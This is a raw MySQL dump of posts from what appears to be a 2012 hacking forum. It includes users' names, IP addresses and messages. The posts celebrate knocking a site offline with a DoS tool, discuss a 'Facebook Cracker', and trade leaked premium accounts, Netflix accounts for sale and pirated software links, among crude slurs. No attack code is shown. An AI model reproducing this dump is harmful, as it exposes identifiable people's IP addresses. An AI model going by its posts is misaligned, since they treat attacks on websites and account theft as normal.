INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1075', '236', '1002', '49', 'RE: [Suggestion] Reporting Posts', '0', '1', 't3h jok3r', '1346015718', 'Nice idea but the thing is that it\'s easier to understand posts and remove them on our discretion. If we add this feature then it will mess up our reports section.', '41.151.135.157', '697796509', '1', '0', '0', '0', '1', '87f77188e5d52ef29da48f7af32394b3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1078', '233', '968', '58', 'RE: Reviewers Group???', '0', '1', 't3h jok3r', '1346016300', 'You guys have a point, we do have enough active members to keep LH up for long but not the marketplace active. I guess apathy could be in-charge of reviews/vouches for now, if not then Jakeus.', '41.151.135.157', '697796509', '1', '0', '0', '0', '1', 'bd7b633e8cdbc0f0d85aaadffe33bf7a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1079', '250', '1060', '42', 'RE: Saturday is deadliest day in Syrian civil war', '0', '1', 't3h jok3r', '1346016502', 'RIP all the ones who have passed away. I don\'t understand why would you kill a stranger?', '41.151.135.157', '697796509', '1', '0', '0', '0', '1', 'db4969d4f816aef40b4ea782f3fb85b2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1080', '130', '995', '15', 'RE: Skype IP Finder - FREE', '0', '1', 't3h jok3r', '1346016634', '[quote=\'iTzIpod\' pid=\'995\' dateline=\'1345949340\'] [quote=\'t3h jok3r\' pid=\'981\' dateline=\'1345940956\'] Oh I see. Finally one of my giveaways were useful for a moment. [/quote] Wait so this no longer works? Even with your API in the + Section? [/quote] Check out the thread for the update.', '41.151.135.157', '697796509', '1', '0', '0', '0', '1', '811e093a6ab34f8d552aab0738b5c063', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1081', '238', '1021', '56', 'RE: Ban the user above you', '0', '10', 'swa4567', '1346016741', 'Banned for abusing admin powers.', '41.151.135.157', '697796509', '0', '0', '0', '0', '1', 'd21e99db9b5320e83f11cb2d9da77901', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1082', '134', '341', '47', 'RE: Win $10 for referring people', '0', '10', 'swa4567', '1346016795', 'Damn this guy is trying his best for the $10.', '41.151.135.157', '697796509', '0', '0', '0', '0', '1', '6e69796354fe5ce92716df132ac24f2f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1083', '191', '666', '15', 'RE: ProDos v1.0', '0', '10', 'swa4567', '1346017051', 'How do you know it\'s made in gamemaker?', '41.151.135.157', '697796509', '0', '0', '0', '0', '1', 'd85a0e7a671640ae67973ee58c56bc56', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1084', '239', '1022', '7', 'RE: 1000th Post', '0', '10', 'swa4567', '1346017187', 'So when we post a thread, it also increases a post count?', '41.151.135.157', '697796509', '0', '0', '0', '0', '1', '32336682f14bcb3082bb654e373a724a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1085', '43', '105', '7', 'RE: How did you find us?', '0', '10', 'swa4567', '1346017247', 'Someone sent me a message on YouTube telling me to j0in this site to hack websites.', '41.151.135.157', '697796509', '0', '0', '0', '0', '1', '318e9a12bd91c2fa53295ab39479c2c7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1086', '246', '1045', '11', 'RE: Safety for Safety\'s sake', '0', '10', 'swa4567', '1346017364', 'Cyberghost VPN is also good, but you need to open and keep the program opened I think. Have a look here: http://l33thacking.com/showthread.php?tid=123&action=lastpost', '41.151.135.157', '697796509', '0', '0', '0', '0', '1', '065e0945f495983d51ffd05e44228ea3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1087', '200', '871', '55', 'RE: [Request] Adobe Photoshop CS6 Portable', '0', '1', 't3h jok3r', '1346018077', '[quote=\'iTzIpod\' pid=\'871\' dateline=\'1345867049\'] [quote=\'t3h jok3r\' pid=\'814\' dateline=\'1345848129\'] [quote=\'iTzIpod\' pid=\'753\' dateline=\'1345818053\'] [quote=\'t3h jok3r\' pid=\'746\' dateline=\'1345817347\'] http://dl.dropbox.com/u/26951938/Photoshop.rar It\'s CS5 though, also It\'s clean. I checked the virus total scan before downloading and the sandbox control panel seems to be OK. ENJOY! [/quote] Is it Portable? :3 Or just the regular Adobe Photoshop CS5? Or Extended? Etc. [/quote] It\'s :opps: Ummm :thinking: Portable I guess cause it\'s basically a zip with a lot of files and the main PS program is in the zip. All you have to do is extract the content and open up PS to start using it. [/quote] It\'s the normal Adobe Photoshop CS6 :p Portable takes up less space. That\'s why I want to get portable. [/quote] You sure it\'s CS6? In the title it says CS5.', '41.151.135.157', '697796509', '1', '0', '0', '0', '1', 'c8db882373673bd4d755ad8bba8282fc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1088', '184', '826', '35', 'RE: [Video] I\'m a video editor!', '0', '1', 't3h jok3r', '1346018187', '[quote=\'iTzIpod\' pid=\'826\' dateline=\'1345849582\'] [quote=\'t3h jok3r\' pid=\'823\' dateline=\'1345848802\'] [quote=\'iTzIpod\' pid=\'817\' dateline=\'1345848351\'] [quote=\'t3h jok3r\' pid=\'811\' dateline=\'1345847969\'] I wish I could view videos :( [/quote] Is that because of the slow internet connection? [/quote] Yup, that\'s correct. I can\'t even watch my favourite TV show, which is prison break. [/quote] Lol I can give you a free Netflix account. You can watch Prison Break on it. Unless that won\'t work? :o [/quote] Can\'t but next week I\'m going back so I\'ll be able to watch videos easily.', '41.151.135.157', '697796509', '1', '0', '0', '0', '1', '9df4e00b096f9d8f093e5c5b43664e8f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1089', '252', '0', '54', 'August 27, 2012 XXXX Accounts', '0', '1', 't3h jok3r', '1346021770', 'BRAZZERS 27X PREMIUM ACCOUNT: [u][url=http://www.filedownloads.org/5y8hinimflqo]DOWNLOAD BOX[/url][/u] MOFOS 32X PREMIUM ACCOUNT: [u][url=http://www.filedownloads.org/q7sroqz5htn1]DOWNLOAD BOX[/url][/u] TWISTYS 30X PREMIUM ACCOUNT: [u][url=http://www.filedownloads.org/njxt674e0o1c]DOWNLOAD BOX[/url][/u] HUSTLER 26X PREMIUM ACCOUNT: [u][url=http://www.filedownloads.org/4sgpeh9icfm8]DOWNLOAD BOX[/url][/u] NAUGHTY AMERICA 29X PREMIUM ACCOUNT: [u][url=http://www.filedownloads.org/v7byyctmv62i]DOWNLOAD BOX[/url][/u] Credits: blogging', '41.150.211.22', '697750294', '1', '0', '0', '0', '1', '8b2db9527bf2e2906f38c14ee45d4725', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1090', '247', '1055', '16', 'RE: [Free] [EBook] How to SE Pringles', '0', '90', 'duhuh', '1346025925', 'its werid last time i went to SE pringles there was no \'pringles\' on the drop down list which is gay, ( i am also from UK)', '86.184.185.30', '1454946590', '0', '0', '0', '0', '1', '206b7ebde58c2349f3456acadf69e3c0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1091', '233', '1078', '58', 'RE: Reviewers Group???', '0', '2', 'Apathy', '1346026572', '[quote=\'t3h jok3r\' pid=\'1078\' dateline=\'1346016300\'] You guys have a point, we do have enough active members to keep LH up for long but not the marketplace active. I guess apathy could be in-charge of reviews/vouches for now, if not then Jakeus. [/quote] Me. I was the reviewers leader on a different bh site. (now closed) and get in skype.', '173.206.130.220', '-1378975012', '0', '0', '0', '0', '1', '51a07daadddd0f1d8dd82d2c35f596c8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1092', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '2', 'Apathy', '1346026655', 'What do I win?', '173.206.130.220', '-1378975012', '0', '0', '0', '0', '1', 'db2550ea417a51f906754481c80a87aa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1121', '255', '0', '5', 'IMPORTANT!!!', '0', '1', 't3h jok3r', '1346074273', 'I would like to discuss two things in this thread. 1. What color should I change the upgraded members username color to? 2. When you get a report on a post, [b]DON\'T[/b] junk the whole thread. Click on the [b]POST ID[/b] then remove the post that falls under the post id because the post is reported not the whole thread.', '41.151.156.103', '697801831', '1', '0', '0', '0', '1', 'c18f4d1c7b6a13275d55a6dd37321acd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1094', '240', '1070', '3', 'RE: [Bug] Complaints & Rep Abuse Support', '0', '82', 'iTzIpod', '1346032320', '[quote=\'t3h jok3r\' pid=\'1070\' dateline=\'1346014775\'] Thanks for the report. I have double checked this and it seems to be working perfectly. Only Staff and the poster can see their own threads. Mods can see it I think, because they are moderating that forum. [/quote] I can\'t see any threads in there now.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '235b6d45ab96cfc4555e0cc98a8c13a5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1095', '184', '1088', '35', 'RE: [Video] I\'m a video editor!', '0', '82', 'iTzIpod', '1346032810', '[quote=\'t3h jok3r\' pid=\'1088\' dateline=\'1346018187\'] [quote=\'iTzIpod\' pid=\'826\' dateline=\'1345849582\'] [quote=\'t3h jok3r\' pid=\'823\' dateline=\'1345848802\'] [quote=\'iTzIpod\' pid=\'817\' dateline=\'1345848351\'] [quote=\'t3h jok3r\' pid=\'811\' dateline=\'1345847969\'] I wish I could view videos :( [/quote] Is that because of the slow internet connection? [/quote] Yup, that\'s correct. I can\'t even watch my favourite TV show, which is prison break. [/quote] Lol I can give you a free Netflix account. You can watch Prison Break on it. Unless that won\'t work? :o [/quote] Can\'t but next week I\'m going back so I\'ll be able to watch videos easily. [/quote] Oh. That\'s good! Glad to here!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '44d03381cddc6a6785ea9ecd3d19b74e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1096', '249', '1092', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1346034594', '[quote=\'Apathy\' pid=\'1092\' dateline=\'1346026655\'] What do I win? [/quote] You win nothing. It is just a forum game. OT: Replying to win', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6d2981f882b475bd234e6d42f1f342bc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1097', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '55', 'Baws', '1346034954', 'no @ an admin close thread, now.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'db55f5f99c1f61a92f3ff99050c2878f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1098', '238', '1021', '56', 'RE: Ban the user above you', '0', '55', 'Baws', '1346035043', 'Banned for having 12 posts, and being gay.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '2662750114b843c9f0b6b7e14adc1c80', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1099', '134', '1082', '47', 'RE: Win $10 for referring people', '0', '82', 'iTzIpod', '1346035044', '[quote=\'swa4567\' pid=\'1082\' dateline=\'1346016795\'] Damn this guy is trying his best for the $10. [/quote] Yeah. I need $10 really badly. I have to pay for some things. :/ I can spend it in 2 seconds once I will or might get it :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5a83a45627c3ec956b29483f23a6951a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1100', '200', '1087', '55', 'RE: [Request] Adobe Photoshop CS6 Portable', '0', '82', 'iTzIpod', '1346036935', '[quote=\'t3h jok3r\' pid=\'1087\' dateline=\'1346018077\'] [quote=\'iTzIpod\' pid=\'871\' dateline=\'1345867049\'] [quote=\'t3h jok3r\' pid=\'814\' dateline=\'1345848129\'] [quote=\'iTzIpod\' pid=\'753\' dateline=\'1345818053\'] [quote=\'t3h jok3r\' pid=\'746\' dateline=\'1345817347\'] http://dl.dropbox.com/u/26951938/Photoshop.rar It\'s CS5 though, also It\'s clean. I checked the virus total scan before downloading and the sandbox control panel seems to be OK. ENJOY! [/quote] Is it Portable? :3 Or just the regular Adobe Photoshop CS5? Or Extended? Etc. [/quote] It\'s :opps: Ummm :thinking: Portable I guess cause it\'s basically a zip with a lot of files and the main PS program is in the zip. All you have to do is extract the content and open up PS to start using it. [/quote] It\'s the normal Adobe Photoshop CS6 :p Portable takes up less space. That\'s why I want to get portable. [/quote] You sure it\'s CS6? In the title it says CS5. [/quote] Whoops :/ Made a typo. I wrote that on my Mobile.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd481406a49f41ccba71447ca25e949e4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1101', '231', '929', '4', 'RE: Sup', '0', '61', 'NXK', '1346039607', 'Welcome, Enjoy it here. Stay HQ', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '7321e203b686e3eb6f0b5dad138b5bc3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1102', '238', '1021', '56', 'RE: Ban the user above you', '0', '2', 'Apathy', '1346042517', 'Banned for trying to suck swa off', '173.206.130.220', '-1378975012', '0', '0', '0', '0', '1', 'e98f034330ef8d386697fec4b8faa1ec', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1104', '164', '484', '28', 'RE: Experiences on your upgrade..', '0', '84', 'Thunder™', '1346045322', 'Grey looks to dull for elites.', '111.91.95.104', '1868259176', '0', '0', '0', '0', '1', '92a8c66f8d0ad0ed60ddd22234fa0d37', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1105', '213', '850', '58', 'RE: What group(s) would you like to see?', '0', '84', 'Thunder™', '1346045493', 'I would Love to see Gamers Group.', '111.91.95.104', '1868259176', '0', '0', '0', '0', '1', '1e5774996f730a42232d86f721840a87', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1106', '253', '0', '56', 'Count to 200', '0', '84', 'Thunder™', '1346045869', '1. The Game Begains :) :lol::lol::lol:', '111.91.95.104', '1868259176', '0', '0', '0', '0', '1', '07d19b183ca473f5f77bdfd4ae71b860', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1107', '254', '0', '49', 'Gamers Section', '0', '84', 'Thunder™', '1346046025', 'I Would love to see Gamers Section SubForums :~ Counterstrike and Steam, Pc, Xbox,Etc', '111.91.95.104', '1868259176', '0', '0', '0', '0', '1', '273fa421431e55dea3ed633eedcb9a43', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1108', '254', '1107', '49', 'RE: Gamers Section', '0', '61', 'NXK', '1346047158', 'There\'s one in the making. Be patient.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '14ea141a1c224e68b44d5705bef827e5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1109', '195', '688', '39', 'RE: [Selling] Cheap Netflix Accounts', '0', '61', 'NXK', '1346047968', 'If you have a Canadian account let me know good sir, I can\'t use USA ones.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'e95233f25fe6cf9549bffaa7c1d4dc1d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1110', '191', '666', '15', 'RE: ProDos v1.0', '0', '53', 'sirchamp', '1346054633', 'It was not made in gamemaker. Hovercatz doesnt have a clue.', '46.245.145.130', '787845506', '1', '0', '0', '0', '1', '09d6759f39165bce31a2dc3c6ce26df0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1111', '163', '483', '30', 'RE: [REAL]Facebook Cracker', '0', '62', 'R?????zo?', '1346067131', 'Anyone getting this error? [spoiler][img]http://i.imgur.com/q7v3E.png[/img] I\'m on windows 7 x64bit[/spoiler]', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '250103c537f8a824c8eb8ff2f1b57be7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1112', '253', '1106', '56', 'RE: Count to 200', '0', '67', 'HoverCatz', '1346073272', '2. Does it reset when a staff posts?', '85.165.36.95', '1436886111', '1', '0', '67', '1346073281', '1', 'e98b5f011d43325a04e618f86d946d5a', '0', '1346073281'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1113', '239', '1022', '7', 'RE: 1000th Post', '0', '67', 'HoverCatz', '1346073369', 'Yes sir it does', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', 'b88d956a32ad59f57fc75966bc435bf7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1114', '29', '996', '15', 'RE: ???Italian DoS tool (Great for hitting sites offline)???', '0', '1', 't3h jok3r', '1346073489', '[quote=\'iTzIpod\' pid=\'996\' dateline=\'1345949449\'] Seems legit. Will give it a try and attempt to knock off TP.. t3h jok3r Lmfao [hr] EDIT: Works! t3h jok3r I did it! :D [img]http://i.imgur.com/4axu8.png[/img] Woot EDIT: t3h jok3r. It came back on after 3 minutes.. -.- [/quote] Congratz on the knock down. It came back up because after the site went down, the packets stopped hitting TP. So it came back up because there were no incoming attacks to keep it down.', '41.151.156.103', '697801831', '1', '0', '0', '0', '1', '5ec39f9e442038fa101a752fc9f5dad3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1115', '191', '666', '15', 'RE: ProDos v1.0', '0', '1', 't3h jok3r', '1346073579', 'Uhh OK. Well nice contribution.', '41.151.156.103', '697801831', '1', '0', '0', '0', '1', '8b6e6209bb4ab826d95173478a3324d4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1116', '163', '1111', '30', 'RE: [REAL]Facebook Cracker', '0', '1', 't3h jok3r', '1346073818', '[quote=\'R?????zo?\' pid=\'1111\' dateline=\'1346067131\'] Anyone getting this error? [spoiler][img]http://i.imgur.com/q7v3E.png[/img] I\'m on windows 7 x64bit[/spoiler] [/quote] Download this http://www.mediafire.com/?455m8126fwc2fb9 That\'s all DLL/OCXs you would need for hacking/cracking. You basically missing a file which helps run the program.', '41.151.156.103', '697801831', '1', '0', '0', '0', '1', '81a51985893209df389471388cd4aa3e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1117', '253', '1106', '56', 'RE: Count to 200', '0', '1', 't3h jok3r', '1346073904', '3. No it doesn\'t. Also all posts without a number or wrong number should be reported :D', '41.151.156.103', '697801831', '1', '0', '1', '1346077838', '1', 'e3f5fef8bcf80a36faf271fba57231a2', '0', '1346077838'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1118', '197', '696', '56', 'RE: /me Thread', '0', '1', 't3h jok3r', '1346073947', '/me meant to say dick not fishs dick.', '41.151.156.103', '697801831', '1', '0', '0', '0', '1', '59405f34f7c1ec34b9276e1d7961b455', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1119', '238', '1021', '56', 'RE: Ban the user above you', '0', '1', 't3h jok3r', '1346073975', 'Banned for having 23 positive reps.', '41.151.156.103', '697801831', '1', '0', '0', '0', '1', '27b78f46438847489c05f3f32bcd2265', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1120', '164', '1104', '28', 'RE: Experiences on your upgrade..', '0', '1', 't3h jok3r', '1346074072', '[quote=\'Thunder™\' pid=\'1104\' dateline=\'1346045322\'] Grey looks to dull for elites. [/quote] Taken under consideration.', '41.151.156.103', '697801831', '1', '0', '0', '0', '1', '3b03ba357545ffdaa57ebdd8be7e703d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1122', '233', '1091', '58', 'RE: Reviewers Group???', '0', '1', 't3h jok3r', '1346074485', '[quote=\'Apathy\' pid=\'1091\' dateline=\'1346026572\'] [quote=\'t3h jok3r\' pid=\'1078\' dateline=\'1346016300\'] You guys have a point, we do have enough active members to keep LH up for long but not the marketplace active. I guess apathy could be in-charge of reviews/vouches for now, if not then Jakeus. [/quote] Me. I was the reviewers leader on a different bh site. (now closed) and get in skype. [/quote] What the fuck is your problem? You want to discuss something, you PM me about it and don\'t act like the boss. I promoted iTzIpod because he deserved it and I [b]discussed[/b] it with a online Mod. We have a huge time difference and I told over 6 times 